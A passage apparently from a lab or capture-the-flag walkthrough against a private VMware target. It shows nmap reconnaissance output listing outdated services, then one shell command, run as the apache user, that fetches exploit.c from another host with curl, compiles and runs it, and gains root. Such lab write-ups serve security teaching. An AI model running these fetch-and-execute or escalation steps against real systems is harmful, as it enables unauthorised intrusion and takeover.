kali@kali:~$ sudo nmap -sS -T5 -Pn 192.168.80.16 Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-24 01:02 EST Nmap scan report for 192.168.80.16 Host is up (0.0017s latency). Not shown: 994 closed ports PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 111/tcp open rpcbind 443/tcp open https 631/tcp open ipp 3306/tcp open mysql MAC Address: 00:0C:29:6D:00:A3 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 2.44 seconds
nmap扫描详细信息,输入命令sudo nmap -A -T5 -sS 192.168.80.16。
kali@kali:~$ sudo nmap -A -T5 -sS 192.168.80.16 Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-24 01:15 EST Nmap scan report for 192.168.80.16 Host is up (0.0010s latency). Not shown: 994 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99) | ssh-hostkey: | 1024 8f:3e:8b:1e:58:63:fe:cf:27:a3:18:09:3b:52:cf:72 (RSA1) | 1024 34:6b:45:3d:ba:ce:ca:b2:53:55:ef:1e:43:70:38:36 (DSA) |_ 1024 68:4d:8c:bb:b6:5a:bd:79:71:b8:71:47:ea:00:42:61 (RSA) |_sshv1: Server supports SSHv1 80/tcp open http Apache httpd 2.0.52 ((CentOS)) |_http-server-header: Apache/2.0.52 (CentOS) |_http-title: Site doesn't have a title (text/html; charset=UTF-8). 111/tcp open rpcbind 2 (RPC #100000) 443/tcp open ssl/https? |_ssl-date: 2020-02-24T04:06:21+00:00; -2h09m35s from scanner time. | sslv2: | SSLv2 supported | ciphers: | SSL2_RC4_64_WITH_MD5 | SSL2_DES_192_EDE3_CBC_WITH_MD5 | SSL2_RC2_128_CBC_EXPORT40_WITH_MD5 | SSL2_DES_64_CBC_WITH_MD5 | SSL2_RC4_128_WITH_MD5 | SSL2_RC2_128_CBC_WITH_MD5 |_ SSL2_RC4_128_EXPORT40_WITH_MD5 631/tcp open ipp CUPS 1.1 | http-methods: |_ Potentially risky methods: PUT |_http-server-header: CUPS/1.1 |_http-title: 403 Forbidden 3306/tcp open mysql MySQL (unauthorized) MAC Address: 00:0C:29:6D:00:A3 (VMware) Device type: general purpose Running: Linux 2.6.X OS CPE: cpe:/o:linux:linux_kernel:2.6 OS details: Linux 2.6.9 - 2.6.30 Network Distance: 1 hop
Host script results: |_clock-skew: -2h09m35s
TRACEROUTE HOP RTT ADDRESS 1 1.04 ms 192.168.80.16
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 109.12 seconds
bash-3.00$ cd /tmp && id && curl 192.168.80.14/exploit.c -o exploit.c 2> /dev/null && gcc exploit.c && ./a.out uid=48(apache) gid=48(apache) groups=48(apache) exploit.c:376:28: warning: no newline at end of file sh: no job control in this shell sh-3.00# whoami root